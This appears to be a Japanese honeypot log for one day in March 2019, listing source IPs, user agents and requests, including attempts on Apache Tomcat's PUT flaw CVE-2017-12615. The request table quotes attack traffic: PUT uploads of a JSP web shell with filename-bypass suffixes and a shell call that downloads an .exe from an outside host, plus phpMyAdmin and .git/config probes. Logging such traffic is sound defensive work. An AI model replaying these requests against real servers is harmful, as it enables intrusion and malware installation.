ハニーポット(仮) 観測記録
2019/03/20分です。
アクセス数は少なかったですが
phpMyAdminに対するスキャンの他に
Apache Tomcatの脆弱性(CVE-2017-12615)を狙ったアクセスを確認しました。
PUTしてGETしているようです。
なお
w00tw00t.at.blackhats.romanian.anti-sec:)
はシグネチャ(署名)・名乗りを表しているようです。
総アクセス数:40 (前日比:-2065)
都合により
GET / HTTP/1.1
POST / HTTP/1.1
は除いています。
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 111.115.76.15 | China |
2 | 117.3.69.247 | Vietnam |
1 | 124.120.121.87 | Thailand |
6 | 157.230.84.180 | United States |
3 | 198.167.223.52 | St Kitts and Nevis |
6 | 216.245.197.254 | United States |
3 | 222.85.133.206 | China |
2 | 49.49.242.211 | Thailand |
4 | 60.3.142.83 | China |
6 | 61.155.218.109 | China |
2 | 64.90.186.102 | United States |
3 | 93.174.93.114 | Netherlands |
1 | 94.23.193.110 | France |
UserAgent一覧
件数 | UserAgent |
---|---|
12 | - |
263 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) |
1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0) |
2 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
336 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 |
62 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 |
240 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 |
62 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 |
76 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 |
2 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid[.]hognoob[.]se/download.exe | HTTP/1.1 |
3 | GET | /.git/config | HTTP/1.1 |
1 | GET | /horde3/imp/test.php | HTTP/1.1 |
1 | GET | /horde/imp/test.php | HTTP/1.1 |
1 | GET | /imp/test.php | HTTP/1.1 |
6 | GET | /manager/html | HTTP/1.1 |
2 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
3 | GET | /phpinfo.php | HTTP/1.1 |
2 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /proxy.php | HTTP/1.1 |
2 | GET | /user/register/ | HTTP/1.1 |
2 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
2 | HEAD | /robots.txt | HTTP/1.0 |
4 | HEAD | /robots.txt | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp%20 | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp::$DATA | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp/ | HTTP/1.1 |